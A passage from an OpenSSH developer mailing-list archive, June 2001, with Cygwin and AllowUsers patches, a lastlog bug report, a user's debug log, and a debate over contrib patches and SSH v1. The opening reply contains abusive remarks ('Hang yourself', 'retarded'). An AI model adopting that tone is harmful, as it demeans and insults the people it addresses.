brings with it a risk of > psuedo-forking. You say you won't take this patch because the feature is > unnecesary bloat. The patch writer says okay, and just rolls it in > himself on all his boxes. He also posts it on his website, and all the > other people who liked the idea download it and roll it into their local > installations. By all means. It's free software. Go make a version that is incompatible with all the various SSH books. Hang yourself. Fact is, Silverman's book clearly describes how OpenSSH works now. You want us to change it. Get real. This isn't even a smart conversation, a smart idea, it's just stupid and wasting time. > Now bug reports start coming in, and incompatibilities start creeping in, > and if neither the bug reporter nor the developers realize that the > version in question has such an "un-authorized" patch, confusion will > result. Yes, and Markus will simply ignore those people. > How many patches are already in this state? SecurID? SRP? Some sftp > chroot thing? Others? Again, I don't disagree with your statement, but > the resultant risk should also be considered. What you have stated is precisely what we are trying to avoid. That is why you will not get me supporting all these "buttons". I think we should not distribute them. If someone finds one, and uses it, they are on their own. If they report a problem and are using some tweak, I think Markus and us other main OpenSSH developers should ignore those requests, and instead forward them to people like you. Then you will get a taste of how retarded variations like that are. From simon at sxw.org.uk Mon Jun 4 20:08:47 2001 From: simon at sxw.org.uk (Simon Wilkinson) Date: Mon, 4 Jun 2001 11:08:47 +0100 Subject: GSSAPI patch Message-ID: <01060411084701.05111@loki.dcs.ed.ac.uk> As much as I hate to raise the question of another large contributed patch, given recent traffic, what are the chances of my patch for GSSAPI authentication making it into the tree? Its now been widely reviewed, and seems to be seeing a fair bit of use. There is support for multiple GSSAPI mechanisms. I'm happy to adapt the patch as necessary to get it included - either against the portable tree, or against the OpenBSD tree. Cheers, Simon. -- Simon Wilkinson http://www.sxw.org.uk From vinschen at redhat.com Mon Jun 4 20:16:23 2001 From: vinschen at redhat.com (Corinna Vinschen) Date: Mon, 4 Jun 2001 12:16:23 +0200 Subject: [PATCH]: Drop the use of `check_nt_auth'. In-Reply-To: <20010523161648.S10118@cygbert.vinschen.de>; from vinschen@redhat.com on Wed, May 23, 2001 at 04:16:48PM +0200 References: <20010523114532.R10118@cygbert.vinschen.de> <20010523161648.S10118@cygbert.vinschen.de> Message-ID: <20010604121623.L595@cygbert.vinschen.de> On Wed, May 23, 2001 at 04:16:48PM +0200, Corinna Vinschen wrote: > On Wed, May 23, 2001 at 09:29:43PM +1000, Damien Miller wrote: > > On Wed, 23 May 2001, Corinna Vinschen wrote: > > > > > Hi, > > > > > > the following patch removes some of the Cygwin specific code from > > > OpenSSH. > > > > > > Since Cygwin is able to change the user context on NT/W2K even without > > > a password since the new Cygwin version 1.3.2, there's no need anymore > > > to allow changing the user context only if the sshd user is the same > > > user as the one which logs in or when a password is given. > > > > > > For that reason the whole function `check_nt_auth' and all code which > > > uses it, is completey dropped in the following patch. > > > > Could you add a configure test to ensure that the support for this > > extension is available in the version of Cygwin that the user is > > compiling against? > > Hmm, yes, but... > > would it be better to let the check_nt_auth functionality in but > additionally check for the Cygwin version in the function > to return an appropriate value (Cygwin >= 1.3.2 ==> return TRUE), > perhaps? Ok, I changed my patch to accomodate different abilities of different Cygwin versions. Instead of completely eliminating the check, it now tests for the Cygwin version as well as for the setting in Cygwin which is responsible for that feature. Corinna Index: openbsd-compat/bsd-cygwin_util.c =================================================================== RCS file: /cvs/openssh_cvs/openbsd-compat/bsd-cygwin_util.c,v retrieving revision 1.4 diff -u -p -r1.4 bsd-cygwin_util.c --- openbsd-compat/bsd-cygwin_util.c 2001/04/13 14:28:42 1.4 +++ openbsd-compat/bsd-cygwin_util.c 2001/06/04 10:05:35 @@ -21,10 +21,14 @@ RCSID("$Id: bsd-cygwin_util.c,v 1.4 2001 #include #include +#include #include #include #define is_winnt (GetVersion() < 0x80000000) +#define ntsec_on(c) ((c) && strstr((c),"ntsec") && !strstr((c),"nontsec")) +#define ntea_on(c) ((c) && strstr((c),"ntea") && !strstr((c),"nontea")) + #if defined(open) && open == binary_open # undef open #endif @@ -61,12 +65,34 @@ int check_nt_auth(int pwd_authenticated, * context on NT systems is the password authentication. So * we deny all requsts for changing the user context if another * authentication method is used. - * This may change in future when a special openssh - * subauthentication package is available. + * + * This doesn't apply to Cygwin versions >= 1.3.2 anymore which + * uses the undocumented NtCreateToken() call to create a user + * token if the process has the appropriate privileges and if + * CYGWIN ntsec setting is on. */ - if (is_winnt && !pwd_authenticated && geteuid() != uid) - return 0; - + static int has_create_token = -1; + + if (is_winnt) { + if (has_create_token < 0) { + struct utsname uts; + int major_high = 0, major_low = 0, minor = 0; + char *cygwin = getenv("CYGWIN"); + + has_create_token = 0; + if (ntsec_on(cygwin) && !uname(&uts)) { + sscanf(uts.release, "%d.%d.%d", + &major_high, &major_low, &minor); + if (major_high > 1 || + (major_high == 1 && (major_low > 3 || + (major_low == 3 && minor >= 2)))) + has_create_token = 1; + } + } + if (has_create_token < 1 && + !pwd_authenticated && geteuid() != uid) + return 0; + } return 1; } @@ -82,12 +108,9 @@ int check_ntsec(const char *filename) return 0; /* Evaluate current CYGWIN settings. */ - if ((cygwin = getenv("CYGWIN")) != NULL) { - if (strstr(cygwin, "ntea") && !strstr(cygwin, "nontea")) - allow_ntea = 1; - if (strstr(cygwin, "ntsec") && !strstr(cygwin, "nontsec")) - allow_ntsec = 1; - } + cygwin = getenv("CYGWIN"); + allow_ntea = ntea_on(cygwin); + allow_ntsec = ntsec_on(cygwin); /* * `ntea' is an emulation of POSIX attributes. It doesn't support -- Corinna Vinschen Cygwin Developer Red Hat, Inc. mailto:vinschen at redhat.com From ruf at tik.ee.ethz.ch Mon Jun 4 20:24:24 2001 From: ruf at tik.ee.ethz.ch (Lukas Ruf) Date: Mon, 4 Jun 2001 12:24:24 +0200 Subject: authorizedkeys2 for a DHCP based client Message-ID: <20010604122424.A17990@tik.ee.ethz.ch> Dear all, My Problem: I cannot get authorizedkeys2 working such that I do not need to supply a password. My Configuration: A Linux server with OpenSSH2.9p1 and a fixed IP-Address. A Linux client with OpenSSH2.9p1, DHCP based, so altering names, but the hostname is set no to be adjusted to the DHCP-address. So, the canonical hostname is not the same as the one which is submitted by ssh. My question: Does anyone know how to solve such a problem -- reading the man pages could not lead me to the solution. Thanks in advance for any help! Lukas -- Lukas Ruf Swiss Federal Institute of Technology Office: ETZ-G61.2 Computer Engineering and Phone: +41/1/632 7312 Networks Laboratory (TIK) Fax: +41/1/632 1035 ETH Zentrum PGP 2.6: ID D20BA2ED; Gloriastr. 35 Fingerprint 6323 B9BC 9C8E 6563 B477 BADD FEA6 E6B7 CH-8092 Zurich From vinschen at redhat.com Mon Jun 4 20:25:54 2001 From: vinschen at redhat.com (Corinna Vinschen) Date: Mon, 4 Jun 2001 12:25:54 +0200 Subject: [PATCH]: Add check_ntsec to ownership/mode tests Message-ID: <20010604122554.M595@cygbert.vinschen.de> Hi, I have added calls to `check_ntsec()' to the code which checks for the ownership and modes of identity files and directories. As you might know, check_ntsec() tests if owner/modes are supported by the OS (9x/ME=no, NT/W2K=yes), the filesystem (FAT/FAT32=no, NTFS=yes) and the current Cygwin settings (ntea/ntsec). Corinna Index: auth-rhosts.c =================================================================== RCS file: /cvs/openssh_cvs/auth-rhosts.c,v retrieving revision 1.17 diff -u -p -r1.17 auth-rhosts.c --- auth-rhosts.c 2001/04/12 23:34:35 1.17 +++ auth-rhosts.c 2001/06/04 10:05:34 @@ -228,6 +228,9 @@ auth_rhosts2(struct passwd *pw, const ch pw->pw_name, pw->pw_dir); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(pw->pw_dir)) +#endif if (options.strict_modes && ((st.st_uid != 0 && st.st_uid != pw->pw_uid) || (st.st_mode & 022) != 0)) { Index: auth-rsa.c =================================================================== RCS file: /cvs/openssh_cvs/auth-rsa.c,v retrieving revision 1.31 diff -u -p -r1.31 auth-rsa.c --- auth-rsa.c 2001/04/08 18:27:01 1.31 +++ auth-rsa.c 2001/06/04 10:05:34 @@ -156,6 +156,9 @@ auth_rsa(struct passwd *pw, BIGNUM *clie packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(file)) +#endif if (options.strict_modes) { int fail = 0; char buf[1024]; Index: auth2.c =================================================================== RCS file: /cvs/openssh_cvs/auth2.c,v retrieving revision 1.59 diff -u -p -r1.59 auth2.c --- auth2.c 2001/04/25 12:44:15 1.59 +++ auth2.c 2001/06/04 10:05:35 @@ -696,6 +696,9 @@ user_key_allowed(struct passwd *pw, Key restore_uid(); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(file)) +#endif if (options.strict_modes) { int fail = 0; char buf[1024]; -- Corinna Vinschen Cygwin Developer Red Hat, Inc. mailto:vinschen at redhat.com From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 00:19:37 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 16:19:37 +0200 Subject: authorizedkeys2 for a DHCP based client In-Reply-To: <20010604122424.A17990@tik.ee.ethz.ch>; from ruf@tik.ee.ethz.ch on Mon, Jun 04, 2001 at 12:24:24PM +0200 References: <20010604122424.A17990@tik.ee.ethz.ch> Message-ID: <20010604161937.D15324@folly> my problem: you don't privide any debugging output. sorry. On Mon, Jun 04, 2001 at 12:24:24PM +0200, Lukas Ruf wrote: > Dear all, > > My Problem: I cannot get authorizedkeys2 working such that I do not need > to supply a password. > > My Configuration: > A Linux server with OpenSSH2.9p1 and a fixed IP-Address. > A Linux client with OpenSSH2.9p1, DHCP based, so altering names, but > the hostname is set no to be adjusted to the DHCP-address. So, the > canonical hostname is not the same as the one which is submitted by > ssh. > > My question: > Does anyone know how to solve such a problem -- reading the man > pages could not lead me to the solution. > > Thanks in advance for any help! > > Lukas > -- > Lukas Ruf Swiss Federal Institute of Technology > Office: ETZ-G61.2 Computer Engineering and > Phone: +41/1/632 7312 Networks Laboratory (TIK) > Fax: +41/1/632 1035 ETH Zentrum > PGP 2.6: ID D20BA2ED; Gloriastr. 35 > Fingerprint 6323 B9BC 9C8E 6563 B477 BADD FEA6 E6B7 CH-8092 Zurich From rob at hagopian.net Tue Jun 5 00:41:44 2001 From: rob at hagopian.net (Rob Hagopian) Date: Mon, 4 Jun 2001 10:41:44 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: <20010604102059.B29589@folly> Message-ID: On Mon, 4 Jun 2001, Markus Friedl wrote: > On Mon, Jun 04, 2001 at 12:34:18AM -0400, Rob Hagopian wrote: > > But ssh.com v2 was around before OpenSSH... they fixed a lot of things > > from v1 to v2, I liked that one and was disappointed to see openssh revert > > back... > > i did not revert from their version. > > openssh is based on 1.2.12 and we improved 1.2.12. > > i never touched ssh.com's v2, because it's not free software. > > many people refused to switch to ssh.com's v2, not only because of > the restrictive licence, but because all the configuration changed. > > remember, most of the ssh users are still v1 users. > > i'm not going to do this. and i won't support 10 different > ways of specifying keys. this is openssh and not perl. > > moreover, i don't see much benefit for directories over files. Indeed, you never did touch the code base, but you still had to add a number of features/changes to the code to support v2. Even if you did an entirely clean room implementation (something I happen to think is a good idea) I'd still maintain that the ssh v2 ability to store keys as files came (long) before openssh v2 support. Why even cater to those people? Even the FreeBSD security notices specificly mention that ssh v1 has inherent security problems. I don't even see why it's turned on by default for a distribution that superficially appears so security concious. > > My suggestion was only to put it into /contrib... is that OK then? > > depends on the size of the patch. but if we have it in contrib, > then ppl will start to expect this from core-openssh. I won't claim that that's completely untrue, I notice a lot of emails from people who want stuff from the portable code base to migrate back into core. But I don't think it's fair, or even wise, to reject what three users want (with the only objections coming from committers who don't want it in the core code base) to leave it out of contrib... And a number of files in contrib are actually required to build all the packages for at least redhat. Since portable openssh distributes binaries of these packages aren't those basicly required to work? Finally, if you don't want it in the code dists, what about a webpage with contrib patches? That would even give you an indication of popularity of these patches. Shutting out contributed code like this can only hurt the project in the long run... -Rob From ruf at tik.ee.ethz.ch Tue Jun 5 00:58:57 2001 From: ruf at tik.ee.ethz.ch (Lukas Ruf) Date: Mon, 4 Jun 2001 16:58:57 +0200 Subject: authorizedkeys2 for a DHCP based client In-Reply-To: <20010604161937.D15324@folly>; from markus.friedl@informatik.uni-erlangen.de on Mon, Jun 04, 2001 at 16:19:37 +0200 References: <20010604122424.A17990@tik.ee.ethz.ch> <20010604161937.D15324@folly> Message-ID: <20010604165857.C18004@tik.ee.ethz.ch> Pardon me: here comes the whole output when launching ssh -v -v komsys-pc-lr Thanks for any help: Lukas -- BEGIN OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090601f debug1: Reading configuration data /etc/openssh/ssh_config debug1: Applying options for * debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 9258 geteuid 0 anon 1 debug1: Connecting to komsys-pc-lr [129.132.66.48] port 22. debug1: temporarily_use_uid: 9258/111 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 9258/111 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/ruf/.ssh/identity type 0 debug2: key_type_from_name: unknown key type '-----BEGIN' debug2: key_type_from_name: unknown key type '-----END' debug1: identity file /home/ruf/.ssh/id_rsa type 1 debug2: key_type_from_name: unknown key type '-----BEGIN' debug2: key_type_from_name: unknown key type '-----END' debug1: identity file /home/ruf/.ssh/id_dsa type 2 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.3.0p1 debug1: match: OpenSSH_2.3.0p1 pat ^OpenSSH_2\.3\.0 Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p1 debug2: Original cipher proposal: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: Compat cipher proposal: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour debug2: Original cipher proposal: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: Compat cipher proposal: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour debug2: kex_parse_kexinit: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-dss debug2: kex_parse_kexinit: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes128-cbc,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: 3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes128-cbc,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: hmac-sha1,hmac-md5,hmac-ripemd160 at openssh.com debug2: kex_parse_kexinit: hmac-sha1,hmac-md5,hmac-ripemd160 at openssh.com debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: mac_init: found hmac-md5 debug1: kex: server->client 3des-cbc hmac-md5 none debug2: mac_init: found hmac-md5 debug1: kex: client->server 3des-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST_OLD sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug1: dh_gen_key: priv key bits set: 202/384 debug1: bits set: 517/1024 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug1: Host 'komsys-pc-lr' is known and matches the DSA host key. debug1: Found key in /home/ruf/.ssh/known_hosts2:3 debug1: bits set: 501/1024 debug1: len 55 datafellows 53376 debug1: ssh_dss_verify: signature correct debug1: kex_derive_keys debug1: newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: waiting for SSH2_MSG_NEWKEYS debug1: newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: done: ssh_kex2. debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,password debug1: next auth method to try is publickey debug1: try pubkey: /home/ruf/.ssh/id_rsa debug2: we sent a publickey packet, wait for reply debug1: authentications that can continue: publickey,password debug1: try pubkey: /home/ruf/.ssh/id_dsa debug2: we sent a publickey packet, wait for reply debug1: authentications that can continue: publickey,password debug2: we did not send a packet, disable method debug1: next auth method to try is password debug2: packet_inject_ignore: current 56 debug2: packet_inject_ignore: block 8 have 8 nb 8 mini 2 need 8 debug2: we sent a password packet, wait for reply debug1: ssh-userauth2 successful: method password debug1: fd 5 setting O_NONBLOCK debug1: fd 6 IS O_NONBLOCK debug1: channel 0: new [client-session] debug1: channel_new: 0 debug1: send channel open 0 debug1: Entering interactive session. debug2: callback start debug1: client_init id 0 arg 0 debug2: tty_make_modes: ospeed 38400 debug2: tty_make_modes: ispeed 38400 debug2: tty_make_modes: 1 3 debug2: tty_make_modes: 2 28 debug2: tty_make_modes: 3 127 debug2: tty_make_modes: 4 21 debug2: tty_make_modes: 5 4 debug2: tty_make_modes: 6 0 debug2: tty_make_modes: 7 0 debug2: tty_make_modes: 8 17 debug2: tty_make_modes: 9 19 debug2: tty_make_modes: 10 26 debug2: tty_make_modes: 12 18 debug2: tty_make_modes: 13 23 debug2: tty_make_modes: 14 22 debug2: tty_make_modes: 18 15 debug2: tty_make_modes: 30 0 debug2: tty_make_modes: 31 0 debug2: tty_make_modes: 32 0 debug2: tty_make_modes: 33 0 debug2: tty_make_modes: 34 0 debug2: tty_make_modes: 35 0 debug2: tty_make_modes: 36 1 debug2: tty_make_modes: 37 0 debug2: tty_make_modes: 38 1 debug2: tty_make_modes: 39 0 debug2: tty_make_modes: 40 0 debug2: tty_make_modes: 41 0 debug2: tty_make_modes: 50 1 debug2: tty_make_modes: 51 1 debug2: tty_make_modes: 52 0 debug2: tty_make_modes: 53 1 debug2: tty_make_modes: 54 1 debug2: tty_make_modes: 55 1 debug2: tty_make_modes: 56 0 debug2: tty_make_modes: 57 0 debug2: tty_make_modes: 58 0 debug2: tty_make_modes: 59 1 debug2: tty_make_modes: 60 1 debug2: tty_make_modes: 61 1 debug2: tty_make_modes: 62 0 debug2: tty_make_modes: 70 1 debug2: tty_make_modes: 71 0 debug2: tty_make_modes: 72 1 debug2: tty_make_modes: 73 0 debug2: tty_make_modes: 74 0 debug2: tty_make_modes: 75 0 debug2: tty_make_modes: 90 1 debug2: tty_make_modes: 91 1 debug2: tty_make_modes: 92 0 debug2: tty_make_modes: 93 0 debug1: Requesting X11 forwarding with authentication spoofing. debug1: channel request 0: shell debug2: callback done debug1: channel 0: open confirm rwindow 0 rmax 16384 debug2: channel 0: rcvd adjust 32768 Last login: Mon Jun 4 16:55:51 2001 from uccellina .tcshrc.user sourced .tcshrc.Linux sourced .tcshrc.LaTex sourced .tcshrc successfully sourced komsys-pc-lr]2;ruf at komsys-pc-lr:~:~!51> exit debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug1: channel 0: rcvd eof debug1: channel 0: output open -> drain debug1: channel 0: rcvd close debug1: channel 0: input open -> closed debug1: channel 0: close_read debug2: channel 0: no data after CLOSE debug1: channel 0: obuf empty debug1: channel 0: output drain -> closed debug1: channel 0: close_write debug1: channel 0: send close debug1: channel 0: is dead debug1: channel_free: channel 0: status: The following connections are open: #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1) debug1: channel_free: channel 0: dettaching channel user Connection to komsys-pc-lr closed. debug1: Transferred: stdin 0, stdout 0, stderr 36 bytes in 6.7 seconds debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 5.4 debug1: Exit status 0 -- END On Mon, 04 Jun 2001, Markus Friedl wrote: > my problem: you don't privide any debugging output. sorry. > > On Mon, Jun 04, 2001 at 12:24:24PM +0200, Lukas Ruf wrote: > > Dear all, > > > > My Problem: I cannot get authorizedkeys2 working such that I do not need > > to supply a password. > > > > My Configuration: > > A Linux server with OpenSSH2.9p1 and a fixed IP-Address. > > A Linux client with OpenSSH2.9p1, DHCP based, so altering names, but > > the hostname is set no to be adjusted to the DHCP-address. So, the > > canonical hostname is not the same as the one which is submitted by > > ssh. > > > > My question: > > Does anyone know how to solve such a problem -- reading the man > > pages could not lead me to the solution. > > > > Thanks in advance for any help! > > > > Lukas > > -- > > Lukas Ruf Swiss Federal Institute of Technology > > Office: ETZ-G61.2 Computer Engineering and > > Phone: +41/1/632 7312 Networks Laboratory (TIK) > > Fax: +41/1/632 1035 ETH Zentrum > > PGP 2.6: ID D20BA2ED; Gloriastr. 35 > > Fingerprint 6323 B9BC 9C8E 6563 B477 BADD FEA6 E6B7 CH-8092 Zurich -- Lukas Ruf Swiss Federal Institute of Technology Office: ETZ-G61.2 Computer Engineering and Phone: +41/1/632 7312 Networks Laboratory (TIK) Fax: +41/1/632 1035 ETH Zentrum PGP 2.6: ID D20BA2ED; Gloriastr. 35 Fingerprint 6323 B9BC 9C8E 6563 B477 BADD FEA6 E6B7 CH-8092 Zurich From patl at curl.com Tue Jun 5 01:01:15 2001 From: patl at curl.com (Patrick J. LoPresti) Date: 04 Jun 2001 11:01:15 -0400 Subject: OpenSSH 2.9p1: lastlog_get_entry() should be more careful Message-ID: In OpenSSH 2.9p1, the function loginrec.c:lastlog_get_entry() looks like this: int lastlog_get_entry(struct logininfo *li) { struct lastlog last; int fd; if (lastlog_openseek(li, &fd, O_RDONLY)) { if (atomicio(read, fd, &last, sizeof(last)) != sizeof(last)) { log("lastlog_get_entry: Error reading from %s: %s", LASTLOG_FILE, strerror(errno)); return 0; } else { lastlog_populate_entry(li, &last); return 1; } } else { return 0; } } On Linux (at least version 2.2.19), the call to lastlog_openseek() can succeed even when the /var/log/lastlog file is short (e.g., 0 bytes). Subsequent calls to read() on the file descriptor return zero (EOF). Consequently, the call to atomicio in the function above returns zero, causing OpenSSH to log a bogus error message by examining a bogus errno value. I suggest that the call to atomicio() be checked to see if it returns zero, with no error message generated for this case. That is, I suggest the function be rewritten something like this: int lastlog_get_entry(struct logininfo *li) { struct lastlog last; int fd; if (lastlog_openseek(li, &fd, O_RDONLY)) { int ret = atomicio(read, fd, &last, sizeof(last)); if (ret == sizeof(last)) { lastlog_populate_entry(li, &last); return 1; } else if (ret == 0) { return 0; } else { log("lastlog_get_entry: Error reading from %s: %s", LASTLOG_FILE, strerror(errno)); return 0; } } else { return 0; } } The above is just for illustration; it is still not quite correct. Strictly speaking, you should not examine errno unless atomicio() returns a negative value, because a short read will not set errno either. - Pat From dveeravalli at telica.com Tue Jun 5 01:10:13 2001 From: dveeravalli at telica.com (Deepa Nemmili Veeravalli) Date: Mon, 4 Jun 2001 11:10:13 -0400 Subject: Porting Openssh2 to Lynx Message-ID: <7AC90049E901D511A8CA009027289AEA8EBDA5@wench> Has it ever been tried to port OpenSSH2 to Lynx? Are there any patches available for the same? If not, will it be possible for the OpenSSH project group to do the same? Thanks for any help, Deepa. From mouring at etoh.eviladmin.org Tue Jun 5 01:13:04 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Mon, 4 Jun 2001 10:13:04 -0500 (CDT) Subject: authorized_keys2 directory idea In-Reply-To: Message-ID: On Mon, 4 Jun 2001, Rob Hagopian wrote: > On Mon, 4 Jun 2001, Markus Friedl wrote: > [..] > Why even cater to those people? Even the FreeBSD security notices > specificly mention that ssh v1 has inherent security problems. I don't > even see why it's turned on by default for a distribution that > superficially appears so security concious. > Lets do a small reality check. OpenSSH has had a complete v2 compatibity for how long now? 8 months? No.. 6 months? no.. 5 months? no.. Try about a month. Lets do another reality check. How many people are still using v1? Still over 5x the user base of v2. THIS IS TOTALLY STUPID. v2 is default for all transactions as of v2.9. Which means OpenSSH will only step down if (a) the users tells the software to, (b) the v2 keys don't exist, and (c) If the remote side can not speak v2. IMNSHO this is the correct behavior for at least another year. Maybe by that time we can look at the v2 and v1 stats and consider disabling v1. Migration paths are required evils. Thus is the reason Markus has taken painful amount writing all that compatibility code for v1. And thus is the reason why ssh.com is a pain in the ass. > > > My suggestion was only to put it into /contrib... is that OK then? > > > > depends on the size of the patch. but if we have it in contrib, > > then ppl will start to expect this from core-openssh. > > I won't claim that that's completely untrue, I notice a lot of emails from > people who want stuff from the portable code base to migrate back into > core. But I don't think it's fair, or even wise, to reject what three What portable code? OpenSSH portable should implement no 'new' features outside what is required to get to compile and run. We attempt to bring in 'universal' changes back to the OpenBSD tree when we feel it is right, but I see no reason why (Example) IRIX's overly complex authetication code needs to be put into the clean OpenBSD tree. > users want (with the only objections coming from committers who don't want > it in the core code base) to leave it out of contrib... > I'll step up and state "No I do not feel that it's any easier to track a single file vs multiple little files. Therefor I do not wish to see such code added to the core tree." If that makes any difference. I'm mainly on the Portable side of the development (even if extremely busy and quietly lately). > And a number of files in contrib are actually required to build all the > packages for at least redhat. Since portable openssh distributes binaries > of these packages aren't those basicly required to work? > You are trying to extend logic that is not correct. All but a few cases in contrib/, the files are there to support the portable version directly. You directly need contrib/redhat/ or else you have authentication issues if you wish to use pam. This is nothing like "I wan't feature XYZ, but no one wants to commit it therefor I demand it be in contrib/." > Finally, if you don't want it in the code dists, what about a webpage with > contrib patches? That would even give you an indication of popularity of > these patches. Shutting out contributed code like this can only hurt the > project in the long run... > -Rob Requiring people like myself who help keep the OpenSSH portable tree alive to maintain all those code snipets will hurt the project even more. Because in the end it's the OpenBSD and OpenSSH Portable group stuck with dragging this contrib code forward to each new release. Not the original author who has long since left the mailinglist and potentially their job and no longer cares about the patch they submitted. I look at contrib/ diff files as yet another thing a user will bitch about if it does not apply cleaningly. A 'feature' they would have never even dreamed of had the *.diff file not existed. And one more headache to have to worry about during crunch time in the release process. Hell, at time I've almost removed contrib/chroot.diff because it was not kept up. Anyways, I've had enough of this.=) I have real work that needs to be done. - Ben From dwd at bell-labs.com Tue Jun 5 01:34:42 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Mon, 4 Jun 2001 10:34:42 -0500 Subject: Disabling Password-based auth? (was RE: recent breakins) In-Reply-To: ; from tomh@po.crl.go.jp on Sat, Jun 02, 2001 at 04:26:54PM +0900 References: <20010601161034.D16295@faui02.informatik.uni-erlangen.de> Message-ID: <20010604103442.A25508@lucent.com> On Sat, Jun 02, 2001 at 04:26:54PM +0900, Tom Holroyd wrote: ... > Dykstra's problem can be solved, too. As he mentioned, a clever trojan > could still be built -- it wouldn't get the password but it could still > insert commands into the outgoing channel that would backdoor the user's > account, or forward the established connection to an active attacker; BUT, > if the authentication used forwarded SRP, _and_ if the session keys were > switched to the new shared secret generated as a byproduct of the SRP > authentication, then the MITM would get zilch. I can't think of a fundamental reason why that wouldn't work; I would look at the MITM host at that point like any untrusted network element such as a router. However, it seems to me that it would be a rather drastic change to the SSH implementation and protocol. You can't simply change the session key of the existing session because you need be able to revert back to it when the forwarded session completes. Or, perhaps the forwarded session will be run in the background and multiple other forwarded sessions started in parallel. I'm not very familiar with the SSH 2 protocol specification, but as far as I know there's no precedent for keeping more than one encrypted session going to different servers in the same client. I don't think it's worth doing -- people just shouldn't connect from lesser trusted hosts to more trusted hosts. - Dave Dykstra From tridge at samba.org Tue Jun 5 01:34:25 2001 From: tridge at samba.org (Andrew Tridgell) Date: Mon, 4 Jun 2001 08:34:25 -0700 (PDT) Subject: [patch] user@host in AllowUsers Message-ID: <20010604153425.66E46427C@lists.samba.org> This is a port of a patch I contributed to ssh 1.2.23 in May 1998. I have missed the functionality after moving to OpenSSH so I have updated the patch and hope OpenSSH might accept it. The patch allows sshd_config to have lines like: AllowUsers root at localhost AllowUsers tridge@* AllowUsers guest at 192.168.2.* DenyUsers badguy@* etc. I found this useful for restricting users to only login from hostnames that they pre-arranged with me. Patch is against current cvs. Cheers, Tridge Index: auth.c =================================================================== RCS file: /cvs/openssh_cvs/auth.c,v retrieving revision 1.28 diff -u -r1.28 auth.c --- auth.c 2001/03/19 22:15:57 1.28 +++ auth.c 2001/06/04 15:20:52 @@ -45,6 +45,56 @@ extern ServerOptions options; /* + match a hostname or an IP to a pattern. If the pattern only contains digits and '.' + then match as a IP, otherwise match as a hostname + */ +static int match_host(const char *host, const char *ip, const char *pattern) +{ + const char *p; + for (p=pattern; *p; p++) { + if (!strchr("0123456789*?.", *p)) { + /* treat as a hostname */ + return match_pattern(host, pattern); + } + } + return match_pattern(ip, pattern); +} + + +/* this combines the effect of match_pattern on a username, hostname + and IP address. If the pattern contains a @ then the part preceding + the @ is checked against the username. The part after the @ is + checked against the hostname and IP address. If no @ is found then + a normal match_pattern is done against the username + + This is more useful than just a match_pattern as it allows you to + specify exactly what users are alowed to login from what hosts + (tridge, May 1998) +*/ +static int match_user(const char *user, const char *host, const char 